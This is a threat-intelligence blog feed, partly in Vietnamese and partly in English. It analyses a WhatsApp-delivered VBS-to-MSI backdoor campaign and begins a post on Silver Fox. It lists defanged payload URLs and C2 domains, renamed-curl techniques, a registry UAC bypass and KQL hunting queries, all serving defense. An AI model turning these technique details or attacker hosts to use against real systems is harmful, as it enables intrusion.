<tr>
<td><code>LinkPoint.msi</code></td>
<td>Installer backdoor bổ sung</td>
</tr>
</tbody></table>
<p>Thông qua AnyDesk giả mạo, kẻ tấn công đạt được <strong>quyền truy cập từ xa liên tục</strong>, cho phép đánh cắp dữ liệu, triển khai malware bổ sung hoặc biến hệ thống thành một node trong botnet.</p>
<hr />
<h2>Phân Tích Kỹ Thuật (Technical Analysis)</h2>
<h3>MITRE ATT&amp;CK Mapping</h3>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Kỹ thuật</th>
<th>ID</th>
<th>Chi tiết</th>
</tr>
</thead>
<tbody><tr>
<td>Initial Access</td>
<td>Phishing via Messaging Platform</td>
<td>T1566</td>
<td>VBS qua WhatsApp</td>
</tr>
<tr>
<td>Execution</td>
<td>User Execution: Malicious File</td>
<td>T1204.002</td>
<td>Nạn nhân tự thực thi VBS</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>Masquerading: Rename System Utilities</td>
<td>T1036.003</td>
<td>curl.exe → netapi.dll</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>Abuse of Trusted Cloud Services</td>
<td>T1102</td>
<td>AWS, Tencent, Backblaze</td>
</tr>
<tr>
<td>Privilege Escalation</td>
<td>Abuse Elevation Control: Bypass UAC</td>
<td>T1548.002</td>
<td>Registry UAC bypass</td>
</tr>
<tr>
<td>Persistence</td>
<td>Registry Run Keys / Startup Folder</td>
<td>T1547.001</td>
<td>HKLM registry modification</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>Remote Access Software</td>
<td>T1219</td>
<td>AnyDesk backdoor</td>
</tr>
</tbody></table>
<h3>Điểm Nổi Bật Về Evasion</h3>
<p>Chiến dịch này đặc biệt nguy hiểm bởi sự kết hợp nhiều kỹ thuật né tránh cùng lúc. Việc dùng binary hợp lệ của Windows (LotL) kết hợp với cloud hosting khiến các giải pháp bảo mật dựa trên signature và domain reputation gần như vô dụng. Hơn nữa, kỹ thuật <strong>delayed execution</strong> và thực thi từng giai đoạn giúp tránh các hệ thống sandbox phát hiện hành vi.</p>
<hr />
<h2>Indicators of Compromise (IoC)</h2>
<h3>SHA-256 Hashes — VBS Scripts (Initial Stage)</h3>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Mô tả</th>
</tr>
</thead>
<tbody><tr>
<td><code>a773bf0d400986f9bcd001c84f2e1a0b614c14d9088f3ba23ddc0c75539dc9e0</code></td>
<td>VBS ban đầu từ WhatsApp</td>
</tr>
<tr>
<td><code>22b82421363026940a565d4ffbb7ce4e7798cdc5f53dda9d3229eb8ef3e0289a</code></td>
<td>VBS ban đầu từ WhatsApp</td>
</tr>
</tbody></table>
<h3>SHA-256 Hashes — VBS Droppers (Cloud Stage)</h3>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Mô tả</th>
</tr>
</thead>
<tbody><tr>
<td><code>91ec2ede66c7b4e6d4c8a25ffad4670d5fd7ff1a2d266528548950df2a8a927a</code></td>
<td>Script từ cloud storage</td>
</tr>
<tr>
<td><code>1735fcb8989c99bc8b9741f2a7dbf9ab42b7855e8e9a395c21f11450c35ebb0c</code></td>
<td>Script từ cloud storage</td>
</tr>
<tr>
<td><code>5cd4280b7b5a655b611702b574b0b48cd46d7729c9bbdfa907ca0afa55971662</code></td>
<td>Script từ cloud storage</td>
</tr>
<tr>
<td><code>630dfd5ab55b9f897b54c289941303eb9b0e07f58ca5e925a0fa40f12e752653</code></td>
<td>Script từ cloud storage</td>
</tr>
</tbody></table>
<h3>SHA-256 Hashes — MSI Installers (Final Payload)</h3>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Mô tả</th>
</tr>
</thead>
<tbody><tr>
<td><code>dc3b2db1608239387a36f6e19bba6816a39c93b6aa7329340343a2ab42ccd32d</code></td>
<td>MSI installer</td>
</tr>
<tr>
<td><code>a2b9e0887751c3d775adc547f6c76fea3b4a554793059c00082c1c38956badc8</code></td>
<td>MSI installer</td>
</tr>
<tr>
<td><code>15a730d22f25f87a081bb2723393e6695d2aab38c0eafe9d7058e36f4f589220</code></td>
<td>MSI installer</td>
</tr>
</tbody></table>
<h3>URLs — Cloud Payload Hosting</h3>
<table>
<thead>
<tr>
<th>URL</th>
<th>Dịch vụ</th>
</tr>
</thead>
<tbody><tr>
<td><code>hxxps[:]//bafauac.s3.ap-southeast-1.amazonaws[.]com</code></td>
<td>Amazon S3</td>
</tr>
<tr>
<td><code>hxxps[:]//yifubafu.s3.ap-southeast-1.amazonaws[.]com</code></td>
<td>Amazon S3</td>
</tr>
<tr>
<td><code>hxxps[:]//9ding.s3.ap-southeast-1.amazonaws[.]com</code></td>
<td>Amazon S3</td>
</tr>
<tr>
<td><code>hxxps[:]//f005.backblazeb2.com/file/bsbbmks</code></td>
<td>Backblaze B2</td>
</tr>
<tr>
<td><code>hxxps[:]sinjiabo-1398259625[.]cos.ap-singapore.myqcloud.com</code></td>
<td>Tencent Cloud</td>
</tr>
</tbody></table>
<h3>C2 Domains</h3>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Vai trò</th>
</tr>
</thead>
<tbody><tr>
<td><code>Neescil[.]top</code></td>
<td>Command &amp; Control</td>
</tr>
<tr>
<td><code>velthora[.]top</code></td>
<td>Command &amp; Control</td>
</tr>
</tbody></table>
<hr />
<h2>Hunting Queries (Microsoft Defender / KQL)</h2>
<p>Đây là các query do Microsoft cung cấp để truy tìm hoạt động liên quan:</p>
<p><strong>Phát hiện thực thi VBS script độc hại:</strong></p>
<pre><code class="language-kql">DeviceProcessEvents
| where InitiatingProcessFileName has "wscript.exe"
| where InitiatingProcessCommandLine has_all ("wscript.exe",".vbs")
| where ProcessCommandLine has_all ("ProgramData","-K","-s","-L","-o", "https:")
</code></pre>
<p><strong>Phát hiện VBS payload stage tiếp theo:</strong></p>
<pre><code class="language-kql">DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".vbs"
</code></pre>
<p><strong>Phát hiện MSI installer độc hại:</strong></p>
<pre><code class="language-kql">DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".msi"
</code></pre>
<p><strong>Phát hiện outbound C2 communication:</strong></p>
<pre><code class="language-kql">DeviceNetworkEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where InitiatingProcessCommandLine has_all ("-s","-L","-o", "-k")
</code></pre>
<hr />
<h2>Khuyến Nghị Phòng Thủ (Mitigation &amp; Recommendations)</h2>
<h3>Kiểm soát endpoint</h3>
<ul>
<li><p><strong>Chặn script host</strong> trong các đường dẫn không tin cậy: <code>wscript.exe</code>, <code>cscript.exe</code>, <code>mshta.exe</code></p>
</li>
<li><p>Giám sát các tiến trình Windows bị đổi tên và thực thi với cờ bất thường (đặc biệt là các flag của <code>curl</code>, <code>bitsadmin</code>)</p>
</li>
<li><p>Bật <strong>EDR in block mode</strong> để chặn artifact độc hại ngay cả khi AV không phát hiện</p>
</li>
</ul>
<h3>Giám sát mạng &amp; cloud</h3>
<ul>
<li><p>Kiểm tra và lọc traffic đến các dịch vụ cloud như AWS S3, Tencent Cloud, Backblaze B2 trong bối cảnh doanh nghiệp</p>
</li>
<li><p>Chặn kết nối đến các C2 domain đã biết: <code>Neescil[.]top</code>, <code>velthora[.]top</code></p>
</li>
</ul>
<h3>Phát hiện persistence</h3>
<ul>
<li><p>Giám sát liên tục các thay đổi registry tại <code>HKLM\Software\Microsoft\Win</code></p>
</li>
<li><p>Cảnh báo khi giá trị <code>ConsentPromptBehaviorAdmin</code> bị thay đổi (dấu hiệu bypass UAC)</p>
</li>
<li><p>Theo dõi việc cài đặt MSI không có chữ ký số hợp lệ</p>
</li>
</ul>
<h3>Đào tạo người dùng</h3>
<ul>
<li><p>Huấn luyện nhân viên <strong>không mở file đính kèm</strong> (đặc biệt <code>.vbs</code>, <code>.js</code>, <code>.bat</code>) nhận qua các nền tảng nhắn tin như WhatsApp, kể cả từ người quen</p>
</li>
<li><p>Xây dựng quy trình báo cáo sự cố rõ ràng khi nhận được tin nhắn/file đáng ngờ</p>
</li>
</ul>
<h3>Giải pháp Microsoft cụ thể</h3>
<ul>
<li><p>Bật <strong>cloud-delivered protection</strong> trong Microsoft Defender Antivirus</p>
</li>
<li><p>Kích hoạt <strong>Tamper Protection</strong> kết hợp với <code>DisableLocalAdminMerge</code></p>
</li>
<li><p>Kích hoạt <strong>Attack Surface Reduction (ASR) rules</strong> để chặn các kỹ thuật LotL</p>
</li>
</ul>
<hr />
<h2>Microsoft Defender Detections</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Hoạt động quan sát</th>
<th>Detection Name</th>
</tr>
</thead>
<tbody><tr>
<td>Initial Access</td>
<td>Tải VBS độc hại qua WhatsApp</td>
<td><code>Trojan:VBS/Obfuse.KPP!MTB</code></td>
</tr>
<tr>
<td>Execution / Defense Evasion</td>
<td>Đổi tên <code>curl.exe</code>, <code>bitsadmin.exe</code></td>
<td><code>Suspicious curl behavior</code></td>
</tr>
<tr>
<td>Privilege Escalation</td>
<td>Đọc UAC settings, sửa registry</td>
<td><code>Trojan:VBS/BypassUAC.PAA!MTB</code></td>
</tr>
</tbody></table>
<hr />
<h2>Đánh Giá &amp; Kết Luận</h2>
<p>Chiến dịch này thể hiện sự chuyên nghiệp cao của nhóm tấn công khi tích hợp nhiều lớp evasion trong một chuỗi tấn công duy nhất. Việc lạm dụng các dịch vụ cloud uy tín toàn cầu (AWS, Tencent, Backblaze) phản ánh xu hướng <strong>"living off trusted services"</strong> — phiên bản nâng cấp của LotL truyền thống. Mặc dù danh tính nhóm đe dọa chưa được Microsoft công khai quy kết, nhưng mức độ tinh vi và việc sử dụng AnyDesk như C2 persistent gợi ý khả năng đây là một <strong>nhóm APT có tổ chức</strong> hoặc nhóm cybercrime chuyên nghiệp nhằm vào doanh nghiệp. Đây là một nhắc nhở quan trọng rằng <strong>không có nền tảng nào là an toàn tuyệt đối</strong> và chính sách "zero trust" đối với mọi file nhận được — kể cả từ ứng dụng nhắn tin phổ biến — là yêu cầu bắt buộc trong môi trường doanh nghiệp hiện đại.</p>
<hr />
<h2>Tham Khảo</h2>
<ol>
<li><p><a href="https://www.microsoft.com/en-us/security/blog/2026/03/31/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors/">WhatsApp malware campaign delivers VBScript and MSI backdoors</a></p>
</li>
<li><p><a href="https://www.csoonline.com/article/4153092/whatsapp-malware-campaign-uses-malicious-vbs-files-to-gain-persistent-access.html">WhatsApp malware campaign uses malicious VBS files to gain persistent access</a></p>
</li>
<li><p><a href="https://thehackernews.com/2026/04/microsoft-warns-of-whatsapp-delivered.html">Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[WhatsApp Malware Campaign Delivering VBS Payloads and MSI Backdoors]]></title><description><![CDATA[Executive Summary
In late February 2026, Microsoft Defender Experts detected a sophisticated attack campaign leveraging WhatsApp to distribute malicious Visual Basic Script (VBS) files to Windows user]]></description><link>https://blog.fiscybersec.com/whatsapp-malware-campaign-delivering-vbs-payloads-and-msi-backdoors</link><guid isPermaLink="true">https://blog.fiscybersec.com/whatsapp-malware-campaign-delivering-vbs-payloads-and-msi-backdoors</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[whatsapp]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Đinh Văn Mạnh]]></dc:creator><pubDate>Sun, 05 Apr 2026 02:48:06 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/155fd3ee-88e9-43d7-bed9-d623901cca2b.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<hr />
<h2>Executive Summary</h2>
<p>In late February 2026, Microsoft Defender Experts detected a sophisticated attack campaign leveraging WhatsApp to distribute malicious Visual Basic Script (VBS) files to Windows users. Once a victim executes the file, a multi-stage infection chain is triggered, ultimately granting the attacker full system control via MSI backdoors. What makes this campaign particularly notable is its combination of <strong>social engineering</strong>, <strong>Living-off-the-Land (LotL) techniques</strong>, and <strong>public cloud infrastructure</strong> to evade security solutions.</p>
<hr />
<h2>Threat Landscape</h2>
<p>This campaign reflects a growing trend of abusing trusted communication platforms like WhatsApp to deliver malware. Rather than relying on traditional email phishing, attackers exploit the inherent trust users place in familiar messaging applications to lower their psychological defenses. Notably, <strong>the lure content used to convince victims to open the VBS file has not yet been identified</strong>.</p>
<hr />
<h2>Detailed Attack Chain</h2>
<p>The campaign unfolds across four distinct stages, each building the foundation for the next:</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/eb77182f-f12b-4b03-a16a-2116b02c8289.png" alt="" style="display:block;margin:0 auto" />

<h3>Stage 1 — Initial Access via WhatsApp</h3>
<p>A malicious VBS file is sent directly through a WhatsApp message. Upon execution, the script:</p>
<ul>
<li><p>Creates a hidden directory at <code>C:\ProgramData\EDS8738</code></p>
</li>
<li><p>Copies and <strong>renames legitimate Windows tools</strong>: <code>curl.exe</code> → <code>netapi.dll</code>, <code>bitsadmin.exe</code> → <code>sc.exe</code></p>
</li>
<li><p>The renamed files retain their original PE metadata (<code>OriginalFileName</code>), creating a detectable anomaly for EDR solutions</p>
</li>
</ul>
<h3>Stage 2 — Cloud Payload Retrieval</h3>
<p>Using the renamed binaries with downloader flags, the malware connects to reputable cloud services to fetch secondary payloads:</p>
<ul>
<li><p><code>auxs.vbs</code> and <code>WinUpdate_KB5034231.vbs</code> are hosted on <strong>AWS S3</strong>, <strong>Tencent Cloud</strong>, and <strong>Backblaze B2</strong></p>
</li>
<li><p>This technique makes malicious requests appear as normal system traffic, making it extremely difficult to distinguish from legitimate activity</p>
</li>
</ul>
<h3>Stage 3 — Privilege Escalation &amp; Persistence</h3>
<p>This is the most critical stage of the campaign:</p>
<ul>
<li><p>The malware modifies the <code>ConsentPromptBehaviorAdmin</code> registry value to <strong>disable UAC prompts</strong></p>
</li>
<li><p>It repeatedly attempts to launch <code>cmd.exe</code> with elevated privileges, looping until successful or forcibly interrupted</p>
</li>
<li><p>Persistence is written to <code>HKLM\Software\Microsoft\Win</code> to survive reboots</p>
</li>
<li><p>The entire privilege escalation process occurs <strong>without any user interaction</strong></p>
</li>
</ul>
<h3>Stage 4 — Final Backdoor Deployment</h3>
<p>The final stage installs MSI packages that are <strong>not digitally signed</strong>:</p>
<table>
<thead>
<tr>
<th>Filename</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>AnyDesk.msi</code></td>
<td>Impersonates legitimate remote control software, establishes persistent access</td>
</tr>
<tr>
<td><code>Setup.msi</code></td>
<td>Generic backdoor installer</td>
</tr>
<tr>
<td><code>WinRAR.msi</code></td>
<td>Impersonates a popular archiving tool</td>
</tr>
<tr>
<td><code>LinkPoint.msi</code></td>
<td>Additional backdoor installer</td>
</tr>
</tbody></table>
<p>Through the fake AnyDesk installation, the attacker achieves <strong>persistent remote access</strong>, enabling data exfiltration, additional malware deployment, or enrollment of the system into a botnet.</p>
<hr />
<h2>Technical Analysis</h2>
<h3>MITRE ATT&amp;CK Mapping</h3>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>ID</th>
<th>Details</th>
</tr>
</thead>
<tbody><tr>
<td>Initial Access</td>
<td>Phishing via Messaging Platform</td>
<td>T1566</td>
<td>VBS delivered via WhatsApp</td>
</tr>
<tr>
<td>Execution</td>
<td>User Execution: Malicious File</td>
<td>T1204.002</td>
<td>Victim manually executes VBS</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>Masquerading: Rename System Utilities</td>
<td>T1036.003</td>
<td>curl.exe → netapi.dll</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>Abuse of Trusted Cloud Services</td>
<td>T1102</td>
<td>AWS, Tencent, Backblaze</td>
</tr>
<tr>
<td>Privilege Escalation</td>
<td>Abuse Elevation Control: Bypass UAC</td>
<td>T1548.002</td>
<td>Registry UAC bypass</td>
</tr>
<tr>
<td>Persistence</td>
<td>Registry Run Keys / Startup Folder</td>
<td>T1547.001</td>
<td>HKLM registry modification</td>
</tr>
<tr>
<td>Command &amp; Control</td>
<td>Remote Access Software</td>
<td>T1219</td>
<td>AnyDesk backdoor</td>
</tr>
</tbody></table>
<h3>Evasion Highlights</h3>
<p>This campaign is particularly dangerous due to the simultaneous use of multiple evasion techniques. The combination of legitimate Windows binaries (LotL) with cloud hosting renders signature-based and domain reputation-based security solutions largely ineffective. Furthermore, <strong>delayed execution</strong> and staged delivery help bypass sandbox behavioral analysis systems.</p>
<hr />
<h2>Indicators of Compromise (IoCs)</h2>
<h3>SHA-256 Hashes — VBS Scripts (Initial Stage)</h3>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>a773bf0d400986f9bcd001c84f2e1a0b614c14d9088f3ba23ddc0c75539dc9e0</code></td>
<td>Initial VBS from WhatsApp</td>
</tr>
<tr>
<td><code>22b82421363026940a565d4ffbb7ce4e7798cdc5f53dda9d3229eb8ef3e0289a</code></td>
<td>Initial VBS from WhatsApp</td>
</tr>
</tbody></table>
<h3>SHA-256 Hashes — VBS Droppers (Cloud Stage)</h3>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>91ec2ede66c7b4e6d4c8a25ffad4670d5fd7ff1a2d266528548950df2a8a927a</code></td>
<td>Script from cloud storage</td>
</tr>
<tr>
<td><code>1735fcb8989c99bc8b9741f2a7dbf9ab42b7855e8e9a395c21f11450c35ebb0c</code></td>
<td>Script from cloud storage</td>
</tr>
<tr>
<td><code>5cd4280b7b5a655b611702b574b0b48cd46d7729c9bbdfa907ca0afa55971662</code></td>
<td>Script from cloud storage</td>
</tr>
<tr>
<td><code>630dfd5ab55b9f897b54c289941303eb9b0e07f58ca5e925a0fa40f12e752653</code></td>
<td>Script from cloud storage</td>
</tr>
</tbody></table>
<h3>SHA-256 Hashes — MSI Installers (Final Payload)</h3>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>dc3b2db1608239387a36f6e19bba6816a39c93b6aa7329340343a2ab42ccd32d</code></td>
<td>MSI installer</td>
</tr>
<tr>
<td><code>a2b9e0887751c3d775adc547f6c76fea3b4a554793059c00082c1c38956badc8</code></td>
<td>MSI installer</td>
</tr>
<tr>
<td><code>15a730d22f25f87a081bb2723393e6695d2aab38c0eafe9d7058e36f4f589220</code></td>
<td>MSI installer</td>
</tr>
</tbody></table>
<h3>URLs — Cloud Payload Hosting</h3>
<table>
<thead>
<tr>
<th>URL</th>
<th>Service</th>
</tr>
</thead>
<tbody><tr>
<td><code>hxxps[:]//bafauac.s3.ap-southeast-1.amazonaws[.]com</code></td>
<td>Amazon S3</td>
</tr>
<tr>
<td><code>hxxps[:]//yifubafu.s3.ap-southeast-1.amazonaws[.]com</code></td>
<td>Amazon S3</td>
</tr>
<tr>
<td><code>hxxps[:]//9ding.s3.ap-southeast-1.amazonaws[.]com</code></td>
<td>Amazon S3</td>
</tr>
<tr>
<td><code>hxxps[:]//f005.backblazeb2.com/file/bsbbmks</code></td>
<td>Backblaze B2</td>
</tr>
<tr>
<td><code>hxxps[:]sinjiabo-1398259625[.]cos.ap-singapore.myqcloud.com</code></td>
<td>Tencent Cloud</td>
</tr>
</tbody></table>
<h3>C2 Domains</h3>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Role</th>
</tr>
</thead>
<tbody><tr>
<td><code>Neescil[.]top</code></td>
<td>Command &amp; Control</td>
</tr>
<tr>
<td><code>velthora[.]top</code></td>
<td>Command &amp; Control</td>
</tr>
</tbody></table>
<hr />
<h2>Hunting Queries (Microsoft Defender / KQL)</h2>
<p>The following queries were provided by Microsoft to hunt for related activity:</p>
<p><strong>Detect malicious VBS script execution:</strong></p>
<pre><code class="language-kql">DeviceProcessEvents
| where InitiatingProcessFileName has "wscript.exe"
| where InitiatingProcessCommandLine has_all ("wscript.exe",".vbs")
| where ProcessCommandLine has_all ("ProgramData","-K","-s","-L","-o", "https:")
</code></pre>
<p><strong>Detect next-stage VBS payload retrieval:</strong></p>
<pre><code class="language-kql">DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".vbs"
</code></pre>
<p><strong>Detect malicious MSI installer drop:</strong></p>
<pre><code class="language-kql">DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".msi"
</code></pre>
<p><strong>Detect outbound C2 communication:</strong></p>
<pre><code class="language-kql">DeviceNetworkEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where InitiatingProcessCommandLine has_all ("-s","-L","-o", "-k")
</code></pre>
<hr />
<h2>Mitigation &amp; Recommendations</h2>
<h3>Endpoint Controls</h3>
<ul>
<li><p><strong>Restrict script hosts</strong> in untrusted paths: <code>wscript.exe</code>, <code>cscript.exe</code>, <code>mshta.exe</code></p>
</li>
<li><p>Monitor renamed Windows binaries executing with anomalous flags, especially <code>curl</code> and <code>bitsadmin</code> downloader flags</p>
</li>
<li><p>Enable <strong>EDR in block mode</strong> to neutralize malicious artifacts even when antivirus does not detect them</p>
</li>
</ul>
<h3>Network &amp; Cloud Monitoring</h3>
<ul>
<li><p>Audit and filter outbound traffic to public cloud services (AWS S3, Tencent Cloud, Backblaze B2) in enterprise contexts</p>
</li>
<li><p>Block connections to known C2 domains: <code>Neescil[.]top</code>, <code>velthora[.]top</code></p>
</li>
</ul>
<h3>Persistence Detection</h3>
<ul>
<li><p>Continuously monitor registry changes at <code>HKLM\Software\Microsoft\Win</code></p>
</li>
<li><p>Alert on modifications to <code>ConsentPromptBehaviorAdmin</code> (indicator of UAC bypass)</p>
</li>
<li><p>Flag MSI package installations that lack valid digital signatures</p>
</li>
</ul>
<h3>User Awareness</h3>
<ul>
<li><p>Train employees <strong>never to open attachments</strong> (especially <code>.vbs</code>, <code>.js</code>, <code>.bat</code>) received via messaging platforms such as WhatsApp — even from known contacts</p>
</li>
<li><p>Establish a clear incident reporting process for suspicious messages or files received via any communication channel</p>
</li>
</ul>
<h3>Microsoft-Specific Recommendations</h3>
<ul>
<li><p>Enable <strong>cloud-delivered protection</strong> in Microsoft Defender Antivirus</p>
</li>
<li><p>Activate <strong>Tamper Protection</strong> combined with <code>DisableLocalAdminMerge</code></p>
</li>
<li><p>Enable <strong>Attack Surface Reduction (ASR) rules</strong> to block LotL techniques</p>
</li>
</ul>
<hr />
<h2>Microsoft Defender Detections</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Observed Activity</th>
<th>Detection Name</th>
</tr>
</thead>
<tbody><tr>
<td>Initial Access</td>
<td>Malicious VBS downloaded via WhatsApp</td>
<td><code>Trojan:VBS/Obfuse.KPP!MTB</code></td>
</tr>
<tr>
<td>Execution / Defense Evasion</td>
<td>Renaming <code>curl.exe</code>, <code>bitsadmin.exe</code></td>
<td><code>Suspicious curl behavior</code></td>
</tr>
<tr>
<td>Privilege Escalation</td>
<td>Reading UAC settings, modifying registry</td>
<td><code>Trojan:VBS/BypassUAC.PAA!MTB</code></td>
</tr>
</tbody></table>
<hr />
<h2>Analyst Assessment</h2>
<p>This campaign demonstrates a high level of sophistication, integrating multiple evasion layers within a single, cohesive attack chain. The abuse of globally trusted cloud services (AWS, Tencent, Backblaze) reflects an emerging trend of <strong>"living off trusted services"</strong> — an evolution beyond traditional LotL techniques. While Microsoft has not publicly attributed this activity to a specific threat actor, the overall sophistication and use of AnyDesk as a persistent C2 mechanism strongly suggests this is the work of an <strong>organized APT group or professional cybercrime operation</strong> targeting enterprises. This campaign serves as a critical reminder that <strong>no platform is inherently safe</strong>, and enforcing a zero-trust policy toward all received files — regardless of the application used — is a non-negotiable requirement in today's enterprise security posture.</p>
<hr />
<h2>Tham Khảo</h2>
<ol>
<li><p><a href="https://www.microsoft.com/en-us/security/blog/2026/03/31/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors/">WhatsApp malware campaign delivers VBScript and MSI backdoors</a></p>
</li>
<li><p><a href="https://www.csoonline.com/article/4153092/whatsapp-malware-campaign-uses-malicious-vbs-files-to-gain-persistent-access.html">WhatsApp malware campaign uses malicious VBS files to gain persistent access</a></p>
</li>
<li><p><a href="https://thehackernews.com/2026/04/microsoft-warns-of-whatsapp-delivered.html">Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Silver Fox — Expanding Asia Cyber Campaign with AtlasCross RAT and Fake Domains]]></title><description><![CDATA[Executive Summary
Silver Fox — a Chinese-speaking threat actor — is intensifying targeted cyber campaigns against users and organizations across the Asia-Pacific region. According to a report by Germa]]></description><link>https://blog.fiscybersec.com/silver-fox-expanding-asia-cyber-campaign-with-atlascross-rat-and-fake-domains</link><guid isPermaLink="true">https://blog.fiscybersec.com/silver-fox-expanding-asia-cyber-campaign-with-atlascross-rat-and-fake-domains</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[silver fox]]></category><category><![CDATA[campaign]]></category><category><![CDATA[AtlasCross RAT]]></category><category><![CDATA[fake domain]]></category><dc:creator><![CDATA[Đinh Văn Mạnh]]></dc:creator><pubDate>Sun, 05 Apr 2026 02:30:11 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/603620d3-0110-4643-ab83-ceb2f35a270e.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p><strong>Silver Fox</strong> — a Chinese-speaking threat actor — is intensifying targeted cyber campaigns against users and organizations across the Asia-Pacific region. According to a report by Germany-based Hexastrike published in late March 2026, the latest campaign deploys a previously undocumented remote access trojan named <strong>AtlasCross RAT</strong>, distributed through 11 typosquatted domains all registered on the same date — October 27, 2025. Concurrently, Sekoia (France) confirmed the group maintains a "dual-track" model: conducting APT-style espionage operations while continuing financially motivated cybercrime activities across South and Southeast Asia.</p>
<hr />
<h2>Threat Actor Profile</h2>
<p>Silver Fox is a Chinese-origin cybercrime/APT group active since at least 2022. The group is tracked under multiple aliases:</p>
<table>
<thead>
<tr>
<th>Alias</th>
<th>Source</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Silver Fox</strong></td>
<td>Hexastrike, Sekoia</td>
</tr>
<tr>
<td><strong>Void Arachne</strong></td>
<td>Trend Micro</td>
</tr>
<tr>
<td><strong>UTG-Q-1000</strong></td>
<td>Chinese researchers</td>
</tr>
<tr>
<td><strong>The Great Thief of Valley / Valley Thief</strong></td>
<td>Knownsec 404</td>
</tr>
</tbody></table>
<p>According to Knownsec 404, Silver Fox is categorized among the <strong>"most actively operating cyber threats"</strong> in recent years, primarily targeting senior management personnel and finance departments within enterprises. Since 2024, the group has pivoted toward more structured espionage-oriented campaigns alongside its traditional financial objectives.</p>
<hr />
<h2>Campaign Timeline (2025–2026): Three Attack Waves</h2>
<h3>Wave 1 — Taiwan Targeting (Early 2025)</h3>
<p>Beginning at least January 2025, Silver Fox launched phishing campaigns impersonating Taiwan's National Taxation Bureau, timed precisely around the announcement of corporate tax audit lists. Malicious emails carried PDF attachments; when victims clicked embedded content, an infection chain was triggered, deploying <strong>ValleyRAT</strong> through DLL side-loading.</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/6d21e7cc-abb9-4da3-b75a-93a57eda89b6.png" alt="" style="display:block;margin:0 auto" />

<p>Detailed infection chain:</p>
<ol>
<li><p>Phishing email → malicious PDF attachment impersonating Taiwan's Ministry of Finance</p>
</li>
<li><p>PDF contains hidden clickable region (<code>/Annot</code>) leading to ZIP download from <strong>myqcloud</strong> infrastructure</p>
</li>
<li><p>ZIP contains <code>python311.dll</code> (shellcode loader) + <code>View10.exe</code> decoy application</p>
</li>
<li><p>Executes <strong>ValleyRAT</strong>, configured to load from <code>C:\users\public\download\bb.jpg</code></p>
</li>
<li><p>C2 connection: <code>9010.360sdgg[.]com</code></p>
</li>
</ol>
<p>By April 2025, Fortinet confirmed the campaign had expanded to <strong>Japan</strong>.</p>
<h3>Wave 2 — RMM Tool Abuse (Late 2025)</h3>
<p>From mid-December 2025, Silver Fox shifted to distributing <strong>SyncFuture TSM</strong> — a legitimate Chinese remote management tool (RMM) that was deliberately misconfigured. Attackers exploited a configuration handling flaw to embed C2 addresses directly into the <strong>filename</strong> (<code>[ipv4]ClientSetup.exe</code>), thereby avoiding modification of the file's digital signature. This campaign expanded to <strong>Malaysia, Philippines, Thailand, Indonesia, Singapore, and India</strong>.</p>
<h3>Wave 3 — Python Stealer Disguised as WhatsApp (Early 2026)</h3>
<p>In February 2026, Silver Fox replaced the RMM tool with a <strong>custom Python stealer</strong> disguised as a WhatsApp application, targeting primarily Malaysia. This tool harvests credentials and sensitive documents, uploading them to C2 at <code>xqwmwru[.]top</code>, leaving behind distinctive artifacts:</p>
<ul>
<li><p><code>C:\WhatsAppBackup\WhatsAppData.zip</code></p>
</li>
<li><p><code>%TEMP%\whatsapp_backup.lock</code></p>
</li>
<li><p>Spoofed User-Agent: <code>WhatsAppBackup/1.0</code></p>
</li>
</ul>
<hr />
<h2>New Weapon: AtlasCross RAT</h2>
